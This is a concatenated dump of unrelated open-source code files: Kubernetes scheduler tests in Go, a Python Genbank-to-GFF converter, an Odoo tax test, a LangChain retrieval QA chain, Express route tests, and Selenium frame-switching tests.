fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
fwk.Workload: fwk.Add,
},
enableGangScheduling: true,
enableInPlacePodVerticalScaling: true,
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
pluginConfig := defaults.PluginConfigsV1
if !tt.enableSchedulerQueueingHints || !tt.enableDynamicResourceAllocation {
// Set emulated version before setting other feature gates, since it can impact feature dependencies.
featuregatetesting.SetFeatureGateEmulationVersionDuringTest(t, feature.DefaultFeatureGate, version.MustParse("1.33"))
} else if !tt.enableInPlacePodVerticalScaling {
// In place pod resize GA'd in 1.35. Set emulation version to 1.34 for tests that do not have the flag set
featuregatetesting.SetFeatureGateEmulationVersionDuringTest(t, feature.DefaultFeatureGate, version.MustParse("1.34"))
} else {
featuregatetesting.SetFeatureGateDuringTest(t, feature.DefaultFeatureGate, features.NodeDeclaredFeatures, tt.enableNodeDeclaredFeatures)
featuregatetesting.SetFeatureGatesDuringTest(t, feature.DefaultFeatureGate, featuregatetesting.FeatureOverrides{
features.NodeDeclaredFeatures: tt.enableNodeDeclaredFeatures,
features.GenericWorkload: tt.enableGangScheduling,
features.GangScheduling: tt.enableGangScheduling,
})
}
featuregatetesting.SetFeatureGatesDuringTest(t, feature.DefaultFeatureGate, featuregatetesting.FeatureOverrides{
features.InPlacePodVerticalScaling: tt.enableInPlacePodVerticalScaling,
features.DynamicResourceAllocation: tt.enableDynamicResourceAllocation,
})
if !tt.enableSchedulerQueueingHints {
featuregatetesting.SetFeatureGateDuringTest(t, feature.DefaultFeatureGate, features.SchedulerQueueingHints, false)
// The test uses defaults.PluginConfigsV1, which contains the filter timeout.
// With emulation of 1.33, the DRASchedulerFilterTimeout feature gets disabled
// and also cannot be enabled ("pre-alpha"), which makes the config invalid.
// To avoid this, we have to patch the config.
pluginConfig = slices.Clone(pluginConfig)
for i := range pluginConfig {
if pluginConfig[i].Name == "DynamicResources" {
pluginConfig[i].Args = &schedulerapi.DynamicResourcesArgs{}
break
}
}
}
_, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
registry := plugins.NewInTreeRegistry()
cfgPls := &schedulerapi.Plugins{MultiPoint: tt.plugins}
plugins := []fwk.Plugin{&fakeNodePlugin{}, &fakePodPlugin{}, &filterWithoutEnqueueExtensionsPlugin{}, &emptyEventsToRegisterPlugin{}, &fakeQueueSortPlugin{}, &fakebindPlugin{}}
for _, pl := range plugins {
tmpPl := pl
if err := registry.Register(pl.Name(), func(_ context.Context, _ runtime.Object, _ fwk.Handle) (fwk.Plugin, error) {
return tmpPl, nil
}); err != nil {
t.Fatalf("fail to register filter plugin (%s)", pl.Name())
}
}
profile := schedulerapi.KubeSchedulerProfile{Plugins: cfgPls, PluginConfig: pluginConfig}
fwk, err := newFramework(ctx, registry, profile)
if err != nil {
t.Fatal(err)
}
queueingHintMap, err := buildQueueingHintMap(ctx, fwk.EnqueueExtensions())
if err != nil {
t.Fatal(err)
}
queueingHintsPerProfile := internalqueue.QueueingHintMapPerProfile{
"default": queueingHintMap,
}
got := unionedGVKs(queueingHintsPerProfile)
if diff := cmp.Diff(tt.want, got); diff != "" {
t.Errorf("Unexpected eventToPlugin map (-want,+got):%s", diff)
}
})
}
}
func newFramework(ctx context.Context, r frameworkruntime.Registry, profile schedulerapi.KubeSchedulerProfile) (framework.Framework, error) {
return frameworkruntime.NewFramework(ctx, r, &profile,
frameworkruntime.WithSnapshotSharedLister(internalcache.NewSnapshot(nil, nil)),
frameworkruntime.WithInformerFactory(informers.NewSharedInformerFactory(fake.NewClientset(), 0)),
)
}
func TestFrameworkHandler_IterateOverWaitingPods(t *testing.T) {
const (
testSchedulerProfile1 = "test-scheduler-profile-1"
testSchedulerProfile2 = "test-scheduler-profile-2"
testSchedulerProfile3 = "test-scheduler-profile-3"
)
nodes := []runtime.Object{
st.MakeNode().Name("node1").UID("node1").Obj(),
st.MakeNode().Name("node2").UID("node2").Obj(),
st.MakeNode().Name("node3").UID("node3").Obj(),
}
cases := []struct {
name string
profiles []schedulerapi.KubeSchedulerProfile
waitSchedulingPods []*v1.Pod
expectPodNamesInWaitingPods []string
}{
{
name: "pods with same profile are waiting on permit stage",
profiles: []schedulerapi.KubeSchedulerProfile{
{
SchedulerName: testSchedulerProfile1,
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Permit: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
},
waitSchedulingPods: []*v1.Pod{
st.MakePod().Name("pod1").UID("pod1").SchedulerName(testSchedulerProfile1).Obj(),
st.MakePod().Name("pod2").UID("pod2").SchedulerName(testSchedulerProfile1).Obj(),
st.MakePod().Name("pod3").UID("pod3").SchedulerName(testSchedulerProfile1).Obj(),
},
expectPodNamesInWaitingPods: []string{"pod1", "pod2", "pod3"},
},
{
name: "pods with different profiles are waiting on permit stage",
profiles: []schedulerapi.KubeSchedulerProfile{
{
SchedulerName: testSchedulerProfile1,
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Permit: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
{
SchedulerName: testSchedulerProfile2,
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Permit: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
{
SchedulerName: testSchedulerProfile3,
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Permit: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: fakePermit}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
},
waitSchedulingPods: []*v1.Pod{
st.MakePod().Name("pod1").UID("pod1").SchedulerName(testSchedulerProfile1).Obj(),
st.MakePod().Name("pod2").UID("pod2").SchedulerName(testSchedulerProfile1).Obj(),
st.MakePod().Name("pod3").UID("pod3").SchedulerName(testSchedulerProfile2).Obj(),
st.MakePod().Name("pod4").UID("pod4").SchedulerName(testSchedulerProfile3).Obj(),
},
expectPodNamesInWaitingPods: []string{"pod1", "pod2", "pod3", "pod4"},
},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
// Set up scheduler for the 3 nodes.
objs := append([]runtime.Object{&v1.Namespace{ObjectMeta: metav1.ObjectMeta{Name: ""}}}, nodes...)
fakeClient := fake.NewClientset(objs...)
informerFactory := informers.NewSharedInformerFactory(fakeClient, 0)
eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: fakeClient.EventsV1()})
defer eventBroadcaster.Shutdown()
eventRecorder := eventBroadcaster.NewRecorder(scheme.Scheme, fakePermit)
outOfTreeRegistry := frameworkruntime.Registry{
fakePermit: newFakePermitPlugin(eventRecorder),
}
tCtx := utiltesting.Init(t)
scheduler, err := New(
tCtx,
fakeClient,
informerFactory,
nil,
profile.NewRecorderFactory(eventBroadcaster),
WithProfiles(tc.profiles...),
WithFrameworkOutOfTreeRegistry(outOfTreeRegistry),
)
if err != nil {
t.Fatalf("Failed to create scheduler: %v", err)
}
var wg sync.WaitGroup
waitSchedulingPodNumber := len(tc.waitSchedulingPods)
wg.Add(waitSchedulingPodNumber)
stopFn, err := eventBroadcaster.StartEventWatcher(func(obj runtime.Object) {
e, ok := obj.(*eventsv1.Event)
if !ok || (e.Reason != podWaitingReason) {
return
}
wg.Done()
})
if err != nil {
t.Fatal(err)
}
defer stopFn()
// Run scheduler.
informerFactory.Start(tCtx.Done())
informerFactory.WaitForCacheSync(tCtx.Done())
go scheduler.Run(tCtx)
// Send pods to be scheduled.
for _, p := range tc.waitSchedulingPods {
_, err = fakeClient.CoreV1().Pods("").Create(tCtx, p, metav1.CreateOptions{})
if err != nil {
t.Fatal(err)
}
}
// Wait all pods in waitSchedulingPods to be scheduled.
wg.Wait()
tCtx.Eventually(func(utiltesting.TContext) sets.Set[string] {
// Ensure that all waitingPods in scheduler can be obtained from any profiles.
actualPodNamesInWaitingPods := sets.New[string]()
for _, schedFramework := range scheduler.Profiles {
schedFramework.IterateOverWaitingPods(func(pod fwk.WaitingPod) {
actualPodNamesInWaitingPods.Insert(pod.GetPod().Name)
})
}
return actualPodNamesInWaitingPods
}).WithTimeout(permitTimeout).Should(gomega.Equal(sets.New(tc.expectPodNamesInWaitingPods...)), "unexpected waitingPods in scheduler profile")
})
}
}
var _ fwk.QueueSortPlugin = &fakeQueueSortPlugin{}
// fakeQueueSortPlugin is a no-op implementation for QueueSort extension point.
type fakeQueueSortPlugin struct{}
func (pl *fakeQueueSortPlugin) Name() string {
return queueSort
}
func (pl *fakeQueueSortPlugin) Less(_, _ fwk.QueuedPodInfo) bool {
return false
}
var _ fwk.BindPlugin = &fakebindPlugin{}
// fakebindPlugin is a no-op implementation for Bind extension point.
type fakebindPlugin struct{}
func (t *fakebindPlugin) Name() string {
return fakeBind
}
func (t *fakebindPlugin) Bind(ctx context.Context, state fwk.CycleState, p *v1.Pod, nodeName string) *fwk.Status {
return nil
}
// filterWithoutEnqueueExtensionsPlugin implements Filter, but doesn't implement EnqueueExtensions.
type filterWithoutEnqueueExtensionsPlugin struct{}
func (*filterWithoutEnqueueExtensionsPlugin) Name() string { return filterWithoutEnqueueExtensions }
func (*filterWithoutEnqueueExtensionsPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
return nil
}
var hintFromFakeNode = fwk.QueueingHint(100)
type fakeNodePlugin struct{}
var fakeNodePluginQueueingFn = func(_ klog.Logger, _ *v1.Pod, _, _ interface{}) (fwk.QueueingHint, error) {
return hintFromFakeNode, nil
}
func (*fakeNodePlugin) Name() string { return fakeNode }
func (*fakeNodePlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
return nil
}
func (pl *fakeNodePlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
return []fwk.ClusterEventWithHint{
{Event: fwk.ClusterEvent{Resource: fwk.Node, ActionType: fwk.Add}, QueueingHintFn: fakeNodePluginQueueingFn},
}, nil
}
var hintFromFakePod = fwk.QueueingHint(101)
type fakePodPlugin struct{}
var fakePodPluginQueueingFn = func(_ klog.Logger, _ *v1.Pod, _, _ interface{}) (fwk.QueueingHint, error) {
return hintFromFakePod, nil
}
func (*fakePodPlugin) Name() string { return fakePod }
func (*fakePodPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
return nil
}
func (pl *fakePodPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
return []fwk.ClusterEventWithHint{
{Event: fwk.ClusterEvent{Resource: fwk.Pod, ActionType: fwk.Add}, QueueingHintFn: fakePodPluginQueueingFn},
}, nil
}
type emptyEventPlugin struct{}
func (*emptyEventPlugin) Name() string { return emptyEventExtensions }
func (*emptyEventPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
return nil
}
func (pl *emptyEventPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
return nil, nil
}
// errorEventsToRegisterPlugin is a mock plugin that returns an error for EventsToRegister method
type errorEventsToRegisterPlugin struct{}
func (*errorEventsToRegisterPlugin) Name() string { return errorEventsToRegister }
func (*errorEventsToRegisterPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
return nil
}
func (*errorEventsToRegisterPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
return nil, errors.New("mock error")
}
// emptyEventsToRegisterPlugin implement interface fwk.EnqueueExtensions, but returns nil from EventsToRegister.
// This can simulate a plugin registered at scheduler setup, but does nothing
// due to some disabled feature gate.
type emptyEventsToRegisterPlugin struct{}
func (*emptyEventsToRegisterPlugin) Name() string { return emptyEventsToRegister }
func (*emptyEventsToRegisterPlugin) Filter(_ context.Context, _ fwk.CycleState, _ *v1.Pod, _ fwk.NodeInfo) *fwk.Status {
return nil
}
func (*emptyEventsToRegisterPlugin) EventsToRegister(_ context.Context) ([]fwk.ClusterEventWithHint, error) {
return nil, nil
}
// fakePermitPlugin only implements PermitPlugin interface.
type fakePermitPlugin struct {
eventRecorder events.EventRecorder
}
func newFakePermitPlugin(eventRecorder events.EventRecorder) frameworkruntime.PluginFactory {
return func(ctx context.Context, configuration runtime.Object, f fwk.Handle) (fwk.Plugin, error) {
pl := &fakePermitPlugin{
eventRecorder: eventRecorder,
}
return pl, nil
}
}
func (f fakePermitPlugin) Name() string {
return fakePermit
}
const (
podWaitingReason = "podWaiting"
permitTimeout = 10 * time.Second
)
func (f fakePermitPlugin) Permit(ctx context.Context, state fwk.CycleState, p *v1.Pod, nodeName string) (*fwk.Status, time.Duration) {
defer func() {
// Send event with podWaiting reason to broadcast this pod is already waiting in the permit stage.
f.eventRecorder.Eventf(p, nil, v1.EventTypeWarning, podWaitingReason, "", "")
}()
return fwk.NewStatus(fwk.Wait), permitTimeout
}
var _ fwk.PermitPlugin = &fakePermitPlugin{} | go | github | https://github.com/kubernetes/kubernetes | pkg/scheduler/scheduler_test.go |
###############################################################################
# kBaseGenbankToGFF.py
# Copyright (c) 2017, Joshua J Hamilton and Katherine D McMahon
# Affiliation: Department of Bacteriology
# University of Wisconsin-Madison, Madison, Wisconsin, USA
# URL: http://http://mcmahonlab.wisc.edu/
# All rights reserved.
################################################################################
# Convert Genbank files downloaded from KBase into GFF files.
################################################################################
#%%#############################################################################
### Import packages
################################################################################
from BCBio import GFF
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.SeqFeature import SeqFeature
import os
#%%#############################################################################
### Define folder structure
################################################################################
gbkDir = '../gbk'
gffDir = '../gff'
#%%#############################################################################
### Create list of genomes to process
################################################################################
genomeList = []
for genome in os.listdir(gbkDir):
if genome.endswith('.gbk'):
genomeList.append(genome)
genomeList = [genome.replace('.gbk', '') for genome in genomeList]
#%%#############################################################################
### Convert Genbank files to GFF files
### These files are necessary for counting mapped readsconti
################################################################################
# seqid -- SeqRecord ID
# source -- Feature qualifier with key "source"
# type -- Feature type attribute
# start, end -- The Feature Location
# score -- Feature qualifier with key "score"
# strand -- Feature strand attribute
# phase -- Feature qualifier with key "phase"
for genome in genomeList:
inFile = open(gbkDir+'/'+genome+'.gbk')
outFile = open(gffDir+'/'+genome+'.gff', "w")
for gbkRecord in SeqIO.parse(inFile, "genbank"):
for contigFeature in gbkRecord.features:
# The Genbank record is the entire contig
# Check the SeqFeature type to see if we want to procedue
if contigFeature.type in ('CDS', 'misc_RNA', 'tRNA'):
gffSeq = gbkRecord.seq
gffRecord = SeqRecord(gffSeq, gbkRecord.id)
gffQualifiers = {"source": "feature", "ID": contigFeature.qualifiers['gene'], "locus_tag": contigFeature.qualifiers['gene'],"Product": contigFeature.qualifiers['function']}
gffFeature = SeqFeature(contigFeature.location, type=contigFeature.type,
qualifiers=gffQualifiers)
gffRecord.features = [gffFeature]
GFF.write([gffRecord], outFile)
else:
next
inFile.close()
outFile.close() | unknown | codeparrot/codeparrot-clean | ||
from openerp.tests.common import TransactionCase
class TestOnchangeProductId(TransactionCase):
"""Test that when an included tax is mapped by a fiscal position, the included tax must be
subtracted to the price of the product.
"""
def setUp(self):
super(TestOnchangeProductId, self).setUp()
self.fiscal_position_model = self.registry('account.fiscal.position')
self.fiscal_position_tax_model = self.registry('account.fiscal.position.tax')
self.tax_model = self.registry('account.tax')
self.pricelist_model = self.registry('product.pricelist')
self.res_partner_model = self.registry('res.partner')
self.product_tmpl_model = self.registry('product.template')
self.product_model = self.registry('product.product')
self.product_uom_model = self.registry('product.uom')
self.so_line_model = self.registry('purchase.order.line')
def test_onchange_product_id(self):
cr, uid = self.cr, self.uid
uom_id = self.product_uom_model.search(cr, uid, [('name', '=', 'Unit(s)')])[0]
pricelist = self.pricelist_model.search(cr, uid, [('name', '=', 'Public Pricelist')])[0]
partner_id = self.res_partner_model.create(cr, uid, dict(name="George"))
tax_include_id = self.tax_model.create(cr, uid, dict(name="Include tax",
type='percent',
amount='0.21',
price_include=True))
tax_exclude_id = self.tax_model.create(cr, uid, dict(name="Exclude tax",
type='percent',
amount='0.00'))
product_tmpl_id = self.product_tmpl_model.create(cr, uid, dict(name="Voiture",
list_price='121',
supplier_taxes_id=[(6, 0, [tax_include_id])]))
product_id = self.product_model.create(cr, uid, dict(product_tmpl_id=product_tmpl_id))
fp_id = self.fiscal_position_model.create(cr, uid, dict(name="fiscal position",
sequence=1))
fp_tax_id = self.fiscal_position_tax_model.create(cr, uid, dict(position_id=fp_id,
tax_src_id=tax_include_id,
tax_dest_id=tax_exclude_id))
res = self.so_line_model.onchange_product_id(cr, uid, [], pricelist, product_id, 1.0, uom_id, partner_id,
fiscal_position_id=fp_id)
self.assertEquals(100, res['value']['price_unit'], "The included tax must be subtracted to the price") | unknown | codeparrot/codeparrot-clean | ||
"""Question-answering with sources over an index."""
from typing import Any
from langchain_core.callbacks import (
AsyncCallbackManagerForChainRun,
CallbackManagerForChainRun,
)
from langchain_core.documents import Document
from langchain_core.retrievers import BaseRetriever
from pydantic import Field
from langchain_classic.chains.combine_documents.stuff import StuffDocumentsChain
from langchain_classic.chains.qa_with_sources.base import BaseQAWithSourcesChain
class RetrievalQAWithSourcesChain(BaseQAWithSourcesChain):
"""Question-answering with sources over an index."""
retriever: BaseRetriever = Field(exclude=True)
"""Index to connect to."""
reduce_k_below_max_tokens: bool = False
"""Reduce the number of results to return from store based on tokens limit"""
max_tokens_limit: int = 3375
"""Restrict the docs to return from store based on tokens,
enforced only for StuffDocumentChain and if reduce_k_below_max_tokens is to true"""
def _reduce_tokens_below_limit(self, docs: list[Document]) -> list[Document]:
num_docs = len(docs)
if self.reduce_k_below_max_tokens and isinstance(
self.combine_documents_chain,
StuffDocumentsChain,
):
tokens = [
self.combine_documents_chain.llm_chain._get_num_tokens(doc.page_content) # noqa: SLF001
for doc in docs
]
token_count = sum(tokens[:num_docs])
while token_count > self.max_tokens_limit:
num_docs -= 1
token_count -= tokens[num_docs]
return docs[:num_docs]
def _get_docs(
self,
inputs: dict[str, Any],
*,
run_manager: CallbackManagerForChainRun,
) -> list[Document]:
question = inputs[self.question_key]
docs = self.retriever.invoke(
question,
config={"callbacks": run_manager.get_child()},
)
return self._reduce_tokens_below_limit(docs)
async def _aget_docs(
self,
inputs: dict[str, Any],
*,
run_manager: AsyncCallbackManagerForChainRun,
) -> list[Document]:
question = inputs[self.question_key]
docs = await self.retriever.ainvoke(
question,
config={"callbacks": run_manager.get_child()},
)
return self._reduce_tokens_below_limit(docs)
@property
def _chain_type(self) -> str:
"""Return the chain type."""
return "retrieval_qa_with_sources_chain" | python | github | https://github.com/langchain-ai/langchain | libs/langchain/langchain_classic/chains/qa_with_sources/retrieval.py |
var app = require('../../examples/route-separation')
var request = require('supertest')
describe('route-separation', function () {
describe('GET /', function () {
it('should respond with index', function (done) {
request(app)
.get('/')
.expect(200, /Route Separation Example/, done)
})
})
describe('GET /users', function () {
it('should list users', function (done) {
request(app)
.get('/users')
.expect(/TJ/)
.expect(/Tobi/)
.expect(200, done)
})
})
describe('GET /user/:id', function () {
it('should get a user', function (done) {
request(app)
.get('/user/0')
.expect(200, /Viewing user TJ/, done)
})
it('should 404 on missing user', function (done) {
request(app)
.get('/user/10')
.expect(404, done)
})
})
describe('GET /user/:id/view', function () {
it('should get a user', function (done) {
request(app)
.get('/user/0/view')
.expect(200, /Viewing user TJ/, done)
})
it('should 404 on missing user', function (done) {
request(app)
.get('/user/10/view')
.expect(404, done)
})
})
describe('GET /user/:id/edit', function () {
it('should get a user to edit', function (done) {
request(app)
.get('/user/0/edit')
.expect(200, /Editing user TJ/, done)
})
})
describe('PUT /user/:id/edit', function () {
it('should edit a user', function (done) {
request(app)
.put('/user/0/edit')
.set('Content-Type', 'application/x-www-form-urlencoded')
.send({ user: { name: 'TJ', email: 'tj-invalid@vision-media.ca' } })
.expect(302, function (err) {
if (err) return done(err)
request(app)
.get('/user/0')
.expect(200, /tj-invalid@vision-media\.ca/, done)
})
})
})
describe('POST /user/:id/edit?_method=PUT', function () {
it('should edit a user', function (done) {
request(app)
.post('/user/1/edit?_method=PUT')
.set('Content-Type', 'application/x-www-form-urlencoded')
.send({ user: { name: 'Tobi', email: 'tobi-invalid@vision-media.ca' } })
.expect(302, function (err) {
if (err) return done(err)
request(app)
.get('/user/1')
.expect(200, /tobi-invalid@vision-media\.ca/, done)
})
})
})
describe('GET /posts', function () {
it('should get a list of posts', function (done) {
request(app)
.get('/posts')
.expect(200, /Posts/, done)
})
})
}) | javascript | github | https://github.com/expressjs/express | test/acceptance/route-separation.js |
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.common.exceptions import (
NoSuchElementException,
NoSuchFrameException,
WebDriverException)
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# ----------------------------------------------------------------------------------------------
#
# Tests that WebDriver doesn't do anything fishy when it navigates to a page with frames.
#
# ----------------------------------------------------------------------------------------------
@pytest.fixture(autouse=True)
def restore_default_context(driver):
yield
driver.switch_to.default_content()
def testShouldAlwaysFocusOnTheTopMostFrameAfterANavigationEvent(driver, pages):
pages.load("frameset.html")
driver.find_element(By.TAG_NAME, "frameset") # Test passes if this does not throw.
def testShouldNotAutomaticallySwitchFocusToAnIFrameWhenAPageContainingThemIsLoaded(driver, pages):
pages.load("iframes.html")
driver.find_element(By.ID, "iframe_page_heading")
def testShouldOpenPageWithBrokenFrameset(driver, pages):
pages.load("framesetPage3.html")
frame1 = driver.find_element(By.ID, "first")
driver.switch_to.frame(frame1)
driver.switch_to.default_content()
frame2 = driver.find_element(By.ID, "second")
driver.switch_to.frame(frame2) # IE9 can not switch to this broken frame - it has no window.
# ----------------------------------------------------------------------------------------------
#
# Tests that WebDriver can switch to frames as expected.
#
# ----------------------------------------------------------------------------------------------
def testShouldBeAbleToSwitchToAFrameByItsIndex(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(1)
assert driver.find_element(By.ID, "pageNumber").text == "2"
def testShouldBeAbleToSwitchToAnIframeByItsIndex(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame(0)
assert driver.find_element(By.NAME, "id-name1").get_attribute("value") == "name"
def testShouldBeAbleToSwitchToAFrameByItsName(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame("fourth")
assert driver.find_element(By.TAG_NAME, "frame").get_attribute("name") == "child1"
def testShouldBeAbleToSwitchToAnIframeByItsName(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame("iframe1-name")
assert driver.find_element(By.NAME, "id-name1").get_attribute("value") == "name"
def testShouldBeAbleToSwitchToAFrameByItsID(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame("fifth")
assert driver.find_element(By.NAME, "windowOne").text == "Open new window"
def testShouldBeAbleToSwitchToAnIframeByItsID(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame("iframe1")
assert driver.find_element(By.NAME, "id-name1").get_attribute("value") == "name"
def testShouldBeAbleToSwitchToFrameWithNameContainingDot(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame("sixth.iframe1")
assert "Page number 3" in driver.find_element(By.TAG_NAME, "body").text
def testShouldBeAbleToSwitchToAFrameUsingAPreviouslyLocatedWebElement(driver, pages):
pages.load("frameset.html")
frame = driver.find_element(By.TAG_NAME, "frame")
driver.switch_to.frame(frame)
assert driver.find_element(By.ID, "pageNumber").text == "1"
def testShouldBeAbleToSwitchToAnIFrameUsingAPreviouslyLocatedWebElement(driver, pages):
pages.load("iframes.html")
frame = driver.find_element(By.TAG_NAME, "iframe")
driver.switch_to.frame(frame)
element = driver.find_element(By.NAME, "id-name1")
assert element.get_attribute("value") == "name"
def testShouldEnsureElementIsAFrameBeforeSwitching(driver, pages):
pages.load("frameset.html")
frame = driver.find_element(By.TAG_NAME, "frameset")
with pytest.raises(NoSuchFrameException):
driver.switch_to.frame(frame)
def testFrameSearchesShouldBeRelativeToTheCurrentlySelectedFrame(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame("second")
assert driver.find_element(By.ID, "pageNumber").text == "2"
with pytest.raises(NoSuchElementException):
driver.switch_to.frame(driver.find_element_by_name("third"))
driver.switch_to.default_content()
driver.switch_to.frame(driver.find_element_by_name("third"))
with pytest.raises(NoSuchFrameException):
driver.switch_to.frame("second")
driver.switch_to.default_content()
driver.switch_to.frame(driver.find_element_by_name("second"))
assert driver.find_element(By.ID, "pageNumber").text == "2"
def testShouldSelectChildFramesByChainedCalls(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(driver.find_element_by_name("fourth"))
driver.switch_to.frame(driver.find_element_by_name("child2"))
assert driver.find_element(By.ID, "pageNumber").text == "11"
def testShouldThrowFrameNotFoundExceptionLookingUpSubFramesWithSuperFrameNames(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(driver.find_element_by_name("fourth"))
with pytest.raises(NoSuchElementException):
driver.switch_to.frame(driver.find_element_by_name("second"))
def testShouldThrowAnExceptionWhenAFrameCannotBeFound(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.switch_to.frame(driver.find_element_by_name("Nothing here"))
def testShouldThrowAnExceptionWhenAFrameCannotBeFoundByIndex(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchFrameException):
driver.switch_to.frame(27)
def testShouldBeAbleToSwitchToParentFrame(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(driver.find_element_by_name("fourth"))
driver.switch_to.parent_frame()
driver.switch_to.frame(driver.find_element_by_name("first"))
assert driver.find_element(By.ID, "pageNumber").text == "1"
def testShouldBeAbleToSwitchToParentFrameFromASecondLevelFrame(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(driver.find_element_by_name("fourth"))
driver.switch_to.frame(driver.find_element_by_name("child1"))
driver.switch_to.parent_frame()
driver.switch_to.frame(driver.find_element_by_name("child2"))
assert driver.find_element(By.ID, "pageNumber").text == "11"
def testSwitchingToParentFrameFromDefaultContextIsNoOp(driver, pages):
pages.load("xhtmlTest.html")
driver.switch_to.parent_frame()
assert driver.title == "XHTML Test Page"
def testShouldBeAbleToSwitchToParentFromAnIframe(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame(0)
driver.switch_to.parent_frame()
driver.find_element(By.ID, "iframe_page_heading")
# ----------------------------------------------------------------------------------------------
#
# General frame handling behavior tests
#
# ----------------------------------------------------------------------------------------------
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
def testShouldContinueToReferToTheSameFrameOnceItHasBeenSelected(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(2)
checkbox = driver.find_element(By.XPATH, "//input[@name='checky']")
checkbox.click()
checkbox.submit()
# TODO(simon): this should not be needed, and is only here because IE's submit returns too
# soon.
WebDriverWait(driver, 3).until(EC.text_to_be_present_in_element((By.XPATH, '//p'), 'Success!'))
@pytest.mark.xfail_marionette(raises=WebDriverException,
reason='https://github.com/mozilla/geckodriver/issues/610')
def testShouldFocusOnTheReplacementWhenAFrameFollowsALinkToA_TopTargetedPage(driver, pages):
pages.load("frameset.html")
driver.switch_to.frame(0)
driver.find_element(By.LINK_TEXT, "top").click()
expectedTitle = "XHTML Test Page"
WebDriverWait(driver, 3).until(EC.title_is(expectedTitle))
WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, "only-exists-on-xhtmltest")))
def testShouldAllowAUserToSwitchFromAnIframeBackToTheMainContentOfThePage(driver, pages):
pages.load("iframes.html")
driver.switch_to.frame(0)
driver.switch_to.default_content()
driver.find_element(By.ID, "iframe_page_heading")
@pytest.mark.xfail_chrome(reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198')
